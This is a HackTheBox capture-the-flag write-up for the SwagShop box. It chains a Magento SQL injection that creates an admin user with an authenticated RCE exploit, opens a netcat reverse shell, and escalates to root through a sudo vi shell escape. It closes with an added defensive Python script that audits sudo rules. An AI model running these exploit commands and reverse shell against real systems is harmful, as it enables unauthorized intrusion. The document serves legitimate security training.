SwagShop
An easy Linux box from HackTheBox. Chain two CVEs on Magento to get initial access, then abuse sudo privileges on vi to get root.
Recon
Running the usual nmap
georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.140
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6552bd24e8fa3817261379a12f624ec (RSA)
| 256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_ 256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home page
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Not much to see at all. Start an nmap scan of all ports in the background while we look at the webapp
georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -T4 -p- -o nmap/allports 10.10.10.140
Don't get any response from the webapp besides the URL being changed to “swagshop.htb”, so add that to /etc/hosts and navigate to http://swagshop.htb
And see a Magento store, seemingly from 2014 going by the footer
Google around for a Magento scanner, and come across this one
Git clone it, and download the .phar file
georgy@pop-os:~/Documents/htb/swagshop$ php magescan.phar scan:all swagshop.htb
+-----------+------------------+
| Parameter | Value |
+-----------+------------------+
| Edition | Community |
| Version | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+
Don't get much useful info besides the version, so google around for Magento 1.9.0.0 and 1.9.0.1 exploits
Come across this exploit and git clone it into the working directory
Exploitation
Have to modify the exploit a little bit to get it to work
The exploit works as a SQL injection on the admin login form to create a new admin user
Naturally, this means that the URL must be that of the admin page, so change
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
To
target_url = target + "/index.php/admin/"
And run it with
georgy@pop-os:~/Documents/htb/swagshop/Magento-Shoplift-SQLI$ python2.7 poc.py swagshop.htb
WORKED
Check http://swagshop.htb/admin with creds ypwq:123
So then we get an admin login to Magento, but this alone doesn’t get us code exec on the box
Running a quick searchsploit on Magento to see if I missed a true RCE
georgy@pop-os:~/Documents/htb/swagshop$ searchsploit magento
...
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
....
Now that we have admin creds, maybe we can chain it with this exploit?
Looking at it, will have to change a few things, notably the values in the commented “Config” section of the exploit
This exploit also uses the admin login, so the admin URL has to be passed when running it
# Config.
username = 'ypwq'
password = '123'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
Change the username and password to the creds from the first exploit, but for the install date will need the date inside /app/etc/local.xml
Can use curl for this
curl -s http://swagshop.htb/app/etc/local.xml | grep date
<date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
And paste the date in like above
Now run the exploit with
georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "whoami"
www-data
And have code exec! Now to upgrade to a reverse shell, can use a bash reverse shell and start a listener on 8888
georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 8888 >/tmp/f"
And catch the shell
Connection received on 10.10.10.140 43202
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
And upgrade the terminal with the usual python3 pty
$ python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@swagshop:/var/www/html$ export TERM=xterm
CTRL+Z
georgy@pop-os:~/Documents/htb/swagshop$ stty raw -echo;fg
Doing basic enumeration, see that www-data can run vi with sudo as root
www-data@swagshop:/var/www/html$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
So let's do just that
www-data@swagshop:/var/www/html$ sudo -u root /usr/bin/vi /var/www/html/root
Then inside vi, can start a shell with “:!/bin/sh”
And get a shell as root!
# whoami
root
#
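Added example, not part of the original writeup: a small Python audit that parses sudo -l output like the one above and flags rules that amount to a root shell, i.e. an interactive editor granted as root without the NOEXEC tag, wildcard arguments, and NOPASSWD. The SAMPLE text is constructed from the box's sudo -l output plus one benign rule for contrast; the remediation for the vi rule is sudoedit or the NOEXEC tag.

```python
import os
import re
import shlex

# Programs that can run a shell from inside an interactive session (vi ":!sh",
# vim ":shell", less "!sh"). Granted as root via sudo without NOEXEC, they are a root shell.
SHELL_ESCAPE_CAPABLE = {"vi", "vim", "view", "less", "more", "man", "ed", "nano"}
# One rule line as printed by `sudo -l`: "(root) NOPASSWD: /usr/bin/vi /var/www/html/*"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output):
    """Turn the command list of `sudo -l` output into rule dicts."""
    rules, in_cmds = [], False
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("User ") and "may run" in line:
            in_cmds = True  # every indented line after this header is a rule
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(user : group)" -> user
        tags = set(m.group("tags").replace(":", " ").split())  # e.g. {"NOPASSWD"}
        for cmd in m.group("cmds").split(", "):  # several commands may share a line
            rules.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return rules

def audit(rules):
    """Return (command, reasons) for each root rule that can be turned into a shell."""
    findings = []
    for r in rules:
        argv = shlex.split(r["command"])
        prog, args = os.path.basename(argv[0]), argv[1:]
        reasons = []
        if prog in SHELL_ESCAPE_CAPABLE and "NOEXEC" not in r["tags"]:
            reasons.append(f"{prog} allows a shell escape; use sudoedit or the NOEXEC tag")
        if any(ch in a for a in args for ch in "*?["):
            reasons.append("wildcard argument: the caller picks which matching path is opened")
        if "NOPASSWD" in r["tags"]:
            reasons.append("NOPASSWD: no credential needed to exercise the rule")
        if reasons and r["runas"] in ("root", "ALL"):
            findings.append((r["command"], reasons))
    return findings

# Constructed sample: the box's `sudo -l` output plus one benign rule for contrast.
SAMPLE = """User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /usr/bin/systemctl restart apache2
"""
```

Running audit(parse_sudo_l(SAMPLE)) reports only the vi rule, with all three reasons; the same check can be pointed at the output of sudo -l -U <user> during a host review.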